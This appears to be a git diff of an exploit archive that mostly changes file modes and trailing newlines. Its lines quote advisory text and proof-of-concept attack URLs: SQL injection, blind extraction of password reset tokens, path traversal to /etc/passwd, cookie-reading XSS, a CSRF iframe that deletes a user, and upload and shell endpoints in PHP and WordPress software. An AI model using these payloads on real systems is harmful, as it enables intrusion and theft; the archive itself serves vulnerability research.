-http://www.example.co/mpath/lib/browsefolders.php?dir=/ \ No newline at end of file +http://www.example.co/mpath/lib/browsefolders.php?dir=/ \ No newline at end of file diff --git a/platforms/php/webapps/38026.txt b/platforms/php/webapps/38026.txt old mode 100755 new mode 100644 index c91eff35c..0e324a2ff --- a/platforms/php/webapps/38026.txt +++ b/platforms/php/webapps/38026.txt @@ -4,4 +4,4 @@ Friends in War The FAQ Manager is prone to an SQL-injection vulnerability becaus A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/[path]/view_faq.php?question=-4+AND+1=2+UNION+SELECT+0,1,2,version%28%29,4,5-- \ No newline at end of file +http://www.example.com/[path]/view_faq.php?question=-4+AND+1=2+UNION+SELECT+0,1,2,version%28%29,4,5-- \ No newline at end of file diff --git a/platforms/php/webapps/38027.txt b/platforms/php/webapps/38027.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3803.txt b/platforms/php/webapps/3803.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38030.php b/platforms/php/webapps/38030.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38037.html b/platforms/php/webapps/38037.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38039.txt b/platforms/php/webapps/38039.txt old mode 100755 new mode 100644 index 56b7ee0da..96a4df9d7 --- a/platforms/php/webapps/38039.txt +++ b/platforms/php/webapps/38039.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to obtain potentially sensitive infor openSIS 5.1 is vulnerable; other versions may also be affected. -http://www.example.com/opensis5.1/opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php \ No newline at end of file +http://www.example.com/opensis5.1/opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php \ No newline at end of file diff --git a/platforms/php/webapps/38040.txt b/platforms/php/webapps/38040.txt old mode 100755 new mode 100644 index 76bc88f1e..ce32f6338 --- a/platforms/php/webapps/38040.txt +++ b/platforms/php/webapps/38040.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to view files and execute local scrip ATutor 2.1 is vulnerable; other versions may also be affected. -http://www.example.com/ATutor-2.1/ATutor/mods/_core/tool_manager/index.php?h=1&tool_file=./../../../../../../../../../../etc/passwd \ No newline at end of file +http://www.example.com/ATutor-2.1/ATutor/mods/_core/tool_manager/index.php?h=1&tool_file=./../../../../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/38041.txt b/platforms/php/webapps/38041.txt old mode 100755 new mode 100644 index f0fb73538..b19ea69b0 --- a/platforms/php/webapps/38041.txt +++ b/platforms/php/webapps/38041.txt @@ -4,4 +4,4 @@ The Madebymilk theme for WordPress is prone to an SQL-injection vulnerability be An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -https://www.example.com/wp-content/plugins/madebymilk/voting-popup.php?id=null' \ No newline at end of file +https://www.example.com/wp-content/plugins/madebymilk/voting-popup.php?id=null' \ No newline at end of file diff --git a/platforms/php/webapps/38042.txt b/platforms/php/webapps/38042.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38043.txt b/platforms/php/webapps/38043.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38044.txt b/platforms/php/webapps/38044.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38045.html b/platforms/php/webapps/38045.html old mode 100755 new mode 100644 index 1d8fc77d0..a05f7a917 --- a/platforms/php/webapps/38045.html +++ b/platforms/php/webapps/38045.html @@ -9,4 +9,4 @@ XiVO 12.22 is vulnerable; other versions may also be affected. <html><head><body> <title>Deleter user ID 2</title> <iframe src=https://www.example.com/xivo/configuration/index.php/manage/user/?act=delete&id=2&page=1'); -</body></head><html> \ No newline at end of file +</body></head><html> \ No newline at end of file diff --git a/platforms/php/webapps/38046.txt b/platforms/php/webapps/38046.txt old mode 100755 new mode 100644 index 90f0ff193..04c1c6cb1 --- a/platforms/php/webapps/38046.txt +++ b/platforms/php/webapps/38046.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to upload arbitrary files to the affected co Zingiri Web Shop 2.5.0 is vulnerable; other versions may also be affected. -http://www.example.com/wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php?path=[path] \ No newline at end of file +http://www.example.com/wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php?path=[path] \ No newline at end of file diff --git a/platforms/php/webapps/38047.txt b/platforms/php/webapps/38047.txt old mode 100755 new mode 100644 index 4fcf6575e..a9d5cb93b --- a/platforms/php/webapps/38047.txt +++ b/platforms/php/webapps/38047.txt @@ -4,4 +4,4 @@ The Webplayer plugin is prone to an SQL-injection vulnerability because it fails An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/wp-content/plugins/webplayer/config.php?id=[SQL] \ No newline at end of file +http://www.example.com/wp-content/plugins/webplayer/config.php?id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/38048.txt b/platforms/php/webapps/38048.txt old mode 100755 new mode 100644 index d7d061a53..639d3456f --- a/platforms/php/webapps/38048.txt +++ b/platforms/php/webapps/38048.txt @@ -4,4 +4,4 @@ The Plg Novana plugin is prone to an SQL-injection vulnerability because it fail An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/wp-content/plugins/plg_novana/novana_detail.php?lightbox[width]=700&lightbox[height]=400&id=[sql] \ No newline at end of file +http://www.example.com/wp-content/plugins/plg_novana/novana_detail.php?lightbox[width]=700&lightbox[height]=400&id=[sql] \ No newline at end of file diff --git a/platforms/php/webapps/3805.txt b/platforms/php/webapps/3805.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38050.txt b/platforms/php/webapps/38050.txt old mode 100755 new mode 100644 index c69a13840..78bd85f88 --- a/platforms/php/webapps/38050.txt +++ b/platforms/php/webapps/38050.txt @@ -4,4 +4,4 @@ The Zarzadzonie Kontem plugin for WordPress is prone to an arbitrary file-upload An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. -http://www.example.com/wp-content/plugins/zarzadzanie_kontem/js/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php \ No newline at end of file +http://www.example.com/wp-content/plugins/zarzadzanie_kontem/js/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php \ No newline at end of file diff --git a/platforms/php/webapps/38051.txt b/platforms/php/webapps/38051.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38057.txt b/platforms/php/webapps/38057.txt old mode 100755 new mode 100644 index bdd5f38d6..10853db10 --- a/platforms/php/webapps/38057.txt +++ b/platforms/php/webapps/38057.txt @@ -4,4 +4,4 @@ The Magazine Basic theme for WordPress is prone to an SQL-injection vulnerabilit An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/wp-content/themes/magazine-basic/view_artist.php?id=[SQL] \ No newline at end of file +http://www.example.com/wp-content/themes/magazine-basic/view_artist.php?id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/3806.txt b/platforms/php/webapps/3806.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38060.txt b/platforms/php/webapps/38060.txt old mode 100755 new mode 100644 index 22a390bf2..47a128861 --- a/platforms/php/webapps/38060.txt +++ b/platforms/php/webapps/38060.txt @@ -4,4 +4,4 @@ The Ads Box plugin for WordPress is prone to an SQL-injection vulnerability beca An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/wp-content/plugins/ads-box/iframe_ampl.php?count=[SQLi] \ No newline at end of file +http://www.example.com/wp-content/plugins/ads-box/iframe_ampl.php?count=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/38061.txt b/platforms/php/webapps/38061.txt old mode 100755 new mode 100644 index 97145c4f1..b1c306479 --- a/platforms/php/webapps/38061.txt +++ b/platforms/php/webapps/38061.txt @@ -8,4 +8,4 @@ Beat Websites 1.0 is vulnerable; other versions may also be affected. http://www.example.com/page_detail.php?id=1 and 1=1 -http://www.example.com/page_detail.php?id=1 and 1=2 \ No newline at end of file +http://www.example.com/page_detail.php?id=1 and 1=2 \ No newline at end of file diff --git a/platforms/php/webapps/38063.txt b/platforms/php/webapps/38063.txt old mode 100755 new mode 100644 index 1f6b56ea8..2c4cd30be --- a/platforms/php/webapps/38063.txt +++ b/platforms/php/webapps/38063.txt @@ -4,4 +4,4 @@ The Wp-ImageZoom theme for WordPress is prone to an SQL-injection vulnerability An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/wp-content/plugins/wp-imagezoom/zoom.php?id=[SQL] \ No newline at end of file +http://www.example.com/wp-content/plugins/wp-imagezoom/zoom.php?id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/38064.txt b/platforms/php/webapps/38064.txt old mode 100755 new mode 100644 index 5acafe9d0..8e0979d94 --- a/platforms/php/webapps/38064.txt +++ b/platforms/php/webapps/38064.txt @@ -4,4 +4,4 @@ The CStar Design theme for WordPress is prone to an SQL-injection vulnerability An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/wp-content/themes/cstardesign/swf/flashmo/flashmoXML.php?id=[SQL] \ No newline at end of file +http://www.example.com/wp-content/themes/cstardesign/swf/flashmo/flashmoXML.php?id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/38066.txt b/platforms/php/webapps/38066.txt old mode 100755 new mode 100644 index 951a532f5..595e25d1d --- a/platforms/php/webapps/38066.txt +++ b/platforms/php/webapps/38066.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Video Lead Form 0.5 is vulnerable; other versions may also be affected. -http://www.example.com/wordpress/wp-admin/admin.php?page=video-lead-form&errMsg=%27;alert%28String.fromCharCode%2888,83,83%29%29//%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E \ No newline at end of file +http://www.example.com/wordpress/wp-admin/admin.php?page=video-lead-form&errMsg=%27;alert%28String.fromCharCode%2888,83,83%29%29//%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E \ No newline at end of file diff --git a/platforms/php/webapps/38068.txt b/platforms/php/webapps/38068.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38074.txt b/platforms/php/webapps/38074.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38076.txt b/platforms/php/webapps/38076.txt old mode 100755 new mode 100644 index 8c904834d..64599fd68 --- a/platforms/php/webapps/38076.txt +++ b/platforms/php/webapps/38076.txt @@ -10,4 +10,4 @@ http://www.example.com/bigdump.php?start= [SQL] http://www.example.com/bigdump.php?start= [XSS] -http://www.example.com/bigdump.php [File Upload] \ No newline at end of file +http://www.example.com/bigdump.php [File Upload] \ No newline at end of file diff --git a/platforms/php/webapps/38077.txt b/platforms/php/webapps/38077.txt old mode 100755 new mode 100644 index cd3506c44..24b5380d1 --- a/platforms/php/webapps/38077.txt +++ b/platforms/php/webapps/38077.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to compromise the application, access or modi Toolbox 1.4 is vulnerable; other versions may also be affected. -http://www.example.com/wp-content/Themes/toolbox/include/flyer.php?mls=[Sqli] \ No newline at end of file +http://www.example.com/wp-content/Themes/toolbox/include/flyer.php?mls=[Sqli] \ No newline at end of file diff --git a/platforms/php/webapps/38086.html b/platforms/php/webapps/38086.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3809.txt b/platforms/php/webapps/3809.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38090.txt b/platforms/php/webapps/38090.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38091.php b/platforms/php/webapps/38091.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38099.txt b/platforms/php/webapps/38099.txt old mode 100755 new mode 100644 index ffbb361e4..19c97417f --- a/platforms/php/webapps/38099.txt +++ b/platforms/php/webapps/38099.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow TinyMCPUK 0.3 is vulnerable; other versions may also be affected. -http://www.example.com/filemanager/connectors/php/connector.php?test=&lt;h1&gt;p0c&lt;/h1&gt;&amp;xss=&lt;script&gt;alert(document.cookie)&lt;/script&gt; \ No newline at end of file +http://www.example.com/filemanager/connectors/php/connector.php?test=&lt;h1&gt;p0c&lt;/h1&gt;&amp;xss=&lt;script&gt;alert(document.cookie)&lt;/script&gt; \ No newline at end of file diff --git a/platforms/php/webapps/38101.txt b/platforms/php/webapps/38101.txt old mode 100755 new mode 100644 index 42f9d89d3..0ca9e4adc --- a/platforms/php/webapps/38101.txt +++ b/platforms/php/webapps/38101.txt @@ -4,4 +4,4 @@ The Zingiri Forums plugin for WordPress is prone to a local file-include vulnera An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks. -http://www.example.com/wp-content/plugins/zingiri-forum/mybb/memberlist.php?language=[Directory or file] \ No newline at end of file +http://www.example.com/wp-content/plugins/zingiri-forum/mybb/memberlist.php?language=[Directory or file] \ No newline at end of file diff --git a/platforms/php/webapps/38102.txt b/platforms/php/webapps/38102.txt old mode 100755 new mode 100644 index 71ae7c82d..2b2a25130 --- a/platforms/php/webapps/38102.txt +++ b/platforms/php/webapps/38102.txt @@ -4,4 +4,4 @@ The Nest theme for WordPress is prone to an SQL-injection vulnerability because An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/wp-content/themes/nest/gerador_galeria.php?codigo=[Sqli] \ No newline at end of file +http://www.example.com/wp-content/themes/nest/gerador_galeria.php?codigo=[Sqli] \ No newline at end of file diff --git a/platforms/php/webapps/38103.txt b/platforms/php/webapps/38103.txt old mode 100755 new mode 100644 index 127485853..e9f2ee281 --- a/platforms/php/webapps/38103.txt +++ b/platforms/php/webapps/38103.txt @@ -7,4 +7,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Newscoop 4.0.2 is vulnerable; other versions may also be affected. Script: /admin/password_recovery.php -Payload: f_post_sent=1&f_email=example@example.com' and (select if(substr(password_reset_token,15,1)='1',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password \ No newline at end of file +Payload: f_post_sent=1&f_email=example@example.com' and (select if(substr(password_reset_token,15,1)='1',sleep(18000),0) from liveuser_users where id=1 limit 1)-- and 1!='@sikdir and 9='9&Login=Recover+password \ No newline at end of file diff --git a/platforms/php/webapps/38105.txt b/platforms/php/webapps/38105.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38110.txt b/platforms/php/webapps/38110.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38111.txt b/platforms/php/webapps/38111.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38112.txt b/platforms/php/webapps/38112.txt old mode 100755 new mode 100644 index 0891ea715..4c177a51f --- a/platforms/php/webapps/38112.txt +++ b/platforms/php/webapps/38112.txt @@ -4,4 +4,4 @@ FOOT Gestion is prone to an SQL-injection vulnerability because it fails to suff A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?page=contacter.php&id=-1 union select 1,2--%20 \ No newline at end of file +http://www.example.com/index.php?page=contacter.php&id=-1 union select 1,2--%20 \ No newline at end of file diff --git a/platforms/php/webapps/38113.php b/platforms/php/webapps/38113.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38115.txt b/platforms/php/webapps/38115.txt old mode 100755 new mode 100644 index 827879130..2239bacdb --- a/platforms/php/webapps/38115.txt +++ b/platforms/php/webapps/38115.txt @@ -4,4 +4,4 @@ Simple Invoices is prone to multiple HTML-injection vulnerabilities and a cross- Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. -[http://]www.example.com/simpleinvoices/index.php?module=invoices&view=manage&having=%3C/script%3E%3Cscript%3Ealert%28%27POC%20XSS%27%29;%3C/script%3E%3Cscript%3E \ No newline at end of file +[http://]www.example.com/simpleinvoices/index.php?module=invoices&view=manage&having=%3C/script%3E%3Cscript%3Ealert%28%27POC%20XSS%27%29;%3C/script%3E%3Cscript%3E \ No newline at end of file diff --git a/platforms/php/webapps/38119.html b/platforms/php/webapps/38119.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38127.php b/platforms/php/webapps/38127.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38129.txt b/platforms/php/webapps/38129.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3813.txt b/platforms/php/webapps/3813.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38131.txt b/platforms/php/webapps/38131.txt old mode 100755 new mode 100644 index 3a9808acb..43ba90ebf --- a/platforms/php/webapps/38131.txt +++ b/platforms/php/webapps/38131.txt @@ -7,4 +7,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow PHP Address Book 8.1.24.1 is vulnerable; other versions may also be affected. http://www.example.com/index.php?group=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83 -%2C83%29%29%3C%2FSCRIPT%3E \ No newline at end of file +%2C83%29%29%3C%2FSCRIPT%3E \ No newline at end of file diff --git a/platforms/php/webapps/38133.txt b/platforms/php/webapps/38133.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38134.txt b/platforms/php/webapps/38134.txt old mode 100755 new mode 100644 index 106dac794..d436550fb --- a/platforms/php/webapps/38134.txt +++ b/platforms/php/webapps/38134.txt @@ -4,4 +4,4 @@ ZT Autolinks Component for Joomla! is prone to a local file-include vulnerabilit An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. -http://www.example.com/index.php?option=com_ztautolink&controller=../../../../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/index.php?option=com_ztautolink&controller=../../../../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/38135.txt b/platforms/php/webapps/38135.txt old mode 100755 new mode 100644 index 6836cf5d3..930eb0ac7 --- a/platforms/php/webapps/38135.txt +++ b/platforms/php/webapps/38135.txt @@ -4,4 +4,4 @@ The Bit Component for Joomla! is prone to a local file-include vulnerability bec An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. -http://www.example.com/index.php?option=com_bit&controller=../../../../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/index.php?option=com_bit&controller=../../../../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/38139.txt b/platforms/php/webapps/38139.txt old mode 100755 new mode 100644 index 7268f8781..fc0030e24 --- a/platforms/php/webapps/38139.txt +++ b/platforms/php/webapps/38139.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to compromise the application, access or modi Transactions 2.0 is vulnerable; other versions may also be affected. -http://www.example.com//bank.php?transactions=[SQLi] \ No newline at end of file +http://www.example.com//bank.php?transactions=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/3814.txt b/platforms/php/webapps/3814.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38140.php b/platforms/php/webapps/38140.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38141.txt b/platforms/php/webapps/38141.txt old mode 100755 new mode 100644 index 5a6f5e7e4..495b3de35 --- a/platforms/php/webapps/38141.txt +++ b/platforms/php/webapps/38141.txt @@ -6,4 +6,4 @@ An attacker can exploit these vulnerabilities to execute arbitrary script code i Hero 3.76 is vulnerable; other versions may also be affected. -http://www.example.com/hero_os/search?q=" onmouseover%3dalert(/XSS/) %3d" \ No newline at end of file +http://www.example.com/hero_os/search?q=" onmouseover%3dalert(/XSS/) %3d" \ No newline at end of file diff --git a/platforms/php/webapps/38142.txt b/platforms/php/webapps/38142.txt old mode 100755 new mode 100644 index be7a3576c..954d92d6b --- a/platforms/php/webapps/38142.txt +++ b/platforms/php/webapps/38142.txt @@ -6,4 +6,4 @@ An attacker can exploit these vulnerabilities to execute arbitrary script code i Hero 3.76 is vulnerable; other versions may also be affected. -http://www.example.com/hero_os/users/login?errors=true&username=" onmouseover%3dalert(/XSS/) %3d" \ No newline at end of file +http://www.example.com/hero_os/users/login?errors=true&username=" onmouseover%3dalert(/XSS/) %3d" \ No newline at end of file diff --git a/platforms/php/webapps/38143.txt b/platforms/php/webapps/38143.txt old mode 100755 new mode 100644 index 328ac7156..695ff54ae --- a/platforms/php/webapps/38143.txt +++ b/platforms/php/webapps/38143.txt @@ -4,4 +4,4 @@ cPanel is prone to a cross-site scripting vulnerability because it fails to prop An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/frontend/x3/mail/manage.html?account=%22%3E%3Cimg%20src=x%20onerror=prompt%28/XSSBYRAFAY/%29;%3E \ No newline at end of file +http://www.example.com/frontend/x3/mail/manage.html?account=%22%3E%3Cimg%20src=x%20onerror=prompt%28/XSSBYRAFAY/%29;%3E \ No newline at end of file diff --git a/platforms/php/webapps/38144.txt b/platforms/php/webapps/38144.txt old mode 100755 new mode 100644 index dc7e3e22a..c4e08c3d0 --- a/platforms/php/webapps/38144.txt +++ b/platforms/php/webapps/38144.txt @@ -4,4 +4,4 @@ City Reviewer is prone to an SQL-injection vulnerability because the application A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/city_reviewer/search.php?category=6 \ No newline at end of file +http://www.example.com/city_reviewer/search.php?category=6 \ No newline at end of file diff --git a/platforms/php/webapps/38148.txt b/platforms/php/webapps/38148.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38152.txt b/platforms/php/webapps/38152.txt old mode 100755 new mode 100644 index e6338e589..4320b6a89 --- a/platforms/php/webapps/38152.txt +++ b/platforms/php/webapps/38152.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to upload a file and view local files in th MotoCMS 1.3.3 and prior versions are vulnerable. -http://www.example.com/admin/data/users.xml \ No newline at end of file +http://www.example.com/admin/data/users.xml \ No newline at end of file diff --git a/platforms/php/webapps/38153.txt b/platforms/php/webapps/38153.txt old mode 100755 new mode 100644 index 7d0be1699..242474381 --- a/platforms/php/webapps/38153.txt +++ b/platforms/php/webapps/38153.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br cPanel 11.34.0 and WHM 11.34.0 are vulnerable; other versions may also be affected. -http://www.example.com/webmail/x3/mail/clientconf.html?domain=&redirectdomain=&acct=%3Cscript%3Ealert%28%22XSS%20Vulnerability%22%29%3C/script%3E&archiving=0 \ No newline at end of file +http://www.example.com/webmail/x3/mail/clientconf.html?domain=&redirectdomain=&acct=%3Cscript%3Ealert%28%22XSS%20Vulnerability%22%29%3C/script%3E&archiving=0 \ No newline at end of file diff --git a/platforms/php/webapps/38154.txt b/platforms/php/webapps/38154.txt old mode 100755 new mode 100644 index 34527fdb9..389756cdc --- a/platforms/php/webapps/38154.txt +++ b/platforms/php/webapps/38154.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br cPanel 11.34.0 and WHM 11.34.0 are vulnerable; other versions may also be affected. -http://www.example.com/frontend/x3/stats/detailbw.html?mon=Dec&year=2006&domain=%3Cscript%3Ealert%28%22XSS%20Vulnerability%22%29%3C/script%3E&target=x3demob \ No newline at end of file +http://www.example.com/frontend/x3/stats/detailbw.html?mon=Dec&year=2006&domain=%3Cscript%3Ealert%28%22XSS%20Vulnerability%22%29%3C/script%3E&target=x3demob \ No newline at end of file diff --git a/platforms/php/webapps/38155.txt b/platforms/php/webapps/38155.txt old mode 100755 new mode 100644 index bdc2a5d7a..0e80b5d11 --- a/platforms/php/webapps/38155.txt +++ b/platforms/php/webapps/38155.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow http://www.example.com/webmail/x3/mail/filters/editfilter.html?account=&filtername=%22%3E%3Cimg%20src=x%20onerror=prompt(0);%3E -http://www.example.com/webmail/x3/mail/filters/editfilter.html?account=&filtername=%22%3E%3Cimg%20src=x%20onerror=prompt(0);%3E \ No newline at end of file +http://www.example.com/webmail/x3/mail/filters/editfilter.html?account=&filtername=%22%3E%3Cimg%20src=x%20onerror=prompt(0);%3E \ No newline at end of file diff --git a/platforms/php/webapps/38156.txt b/platforms/php/webapps/38156.txt old mode 100755 new mode 100644 index 8880b5113..4fb5f3784 --- a/platforms/php/webapps/38156.txt +++ b/platforms/php/webapps/38156.txt @@ -4,4 +4,4 @@ cPanel is prone to a cross-site scripting vulnerability because it fails to prop An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/frontend/x3/files/dir.html?showhidden=1&dir=%3Cimg%20src=x%20onerror=prompt%280%29;%3E \ No newline at end of file +http://www.example.com/frontend/x3/files/dir.html?showhidden=1&dir=%3Cimg%20src=x%20onerror=prompt%280%29;%3E \ No newline at end of file diff --git a/platforms/php/webapps/38157.txt b/platforms/php/webapps/38157.txt old mode 100755 new mode 100644 index d6a818df3..7df3af370 --- a/platforms/php/webapps/38157.txt +++ b/platforms/php/webapps/38157.txt @@ -36,4 +36,4 @@ print "$postResult"; Shell Access : -http://www.example.com/wordpress/wp-content/plugins/xerte-online/xertefiles/lo-xerte.php \ No newline at end of file +http://www.example.com/wordpress/wp-content/plugins/xerte-online/xertefiles/lo-xerte.php \ No newline at end of file diff --git a/platforms/php/webapps/38158.txt b/platforms/php/webapps/38158.txt old mode 100755 new mode 100644 index ef4874d68..457e87252 --- a/platforms/php/webapps/38158.txt +++ b/platforms/php/webapps/38158.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to compromise the application, e WordPress Shopping Cart 8.1.14 is vulnerable; other versions may also be affected. -http://www.example.com/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php?reqID=1' or 1='1 \ No newline at end of file +http://www.example.com/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php?reqID=1' or 1='1 \ No newline at end of file diff --git a/platforms/php/webapps/38159.txt b/platforms/php/webapps/38159.txt old mode 100755 new mode 100644 index db4c5a038..a743a9cda --- a/platforms/php/webapps/38159.txt +++ b/platforms/php/webapps/38159.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to compromise the application, e WordPress Shopping Cart 8.1.14 is vulnerable; other versions may also be affected. -http://www.example.com/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/backup.php?reqID=1' or 1='1 \ No newline at end of file +http://www.example.com/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/backup.php?reqID=1' or 1='1 \ No newline at end of file diff --git a/platforms/php/webapps/3816.php b/platforms/php/webapps/3816.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38160.txt b/platforms/php/webapps/38160.txt old mode 100755 new mode 100644 index f0d55cb70..4d58bb27a --- a/platforms/php/webapps/38160.txt +++ b/platforms/php/webapps/38160.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to compromise the application, e WordPress Shopping Cart 8.1.14 is vulnerable; other versions may also be affected. -http://www.example.com/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php?reqID=1' or 1='1 \ No newline at end of file +http://www.example.com/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php?reqID=1' or 1='1 \ No newline at end of file diff --git a/platforms/php/webapps/38161.txt b/platforms/php/webapps/38161.txt old mode 100755 new mode 100644 index 5f992c9d6..0d7ec692c --- a/platforms/php/webapps/38161.txt +++ b/platforms/php/webapps/38161.txt @@ -10,4 +10,4 @@ An attacker may leverage these issues to perform spoofing and phishing attacks, osTicket 1.7 DPR3 is vulnerable; other versions may also be affected. -http://www.example.com/learn/ostickRC/scp/l.php?url=http://www.example2.com \ No newline at end of file +http://www.example.com/learn/ostickRC/scp/l.php?url=http://www.example2.com \ No newline at end of file diff --git a/platforms/php/webapps/38162.txt b/platforms/php/webapps/38162.txt old mode 100755 new mode 100644 index 3d2f3ca24..8dbdc4188 --- a/platforms/php/webapps/38162.txt +++ b/platforms/php/webapps/38162.txt @@ -10,4 +10,4 @@ An attacker may leverage these issues to perform spoofing and phishing attacks, osTicket 1.7 DPR3 is vulnerable; other versions may also be affected. -http://www.example.com/learn/ostickRC/scp/tickets.php?a=export&h=9c2601b88c05055b51962b140f5121389&status=%22%20onmouseover=%22alert%281%29%22 \ No newline at end of file +http://www.example.com/learn/ostickRC/scp/tickets.php?a=export&h=9c2601b88c05055b51962b140f5121389&status=%22%20onmouseover=%22alert%281%29%22 \ No newline at end of file diff --git 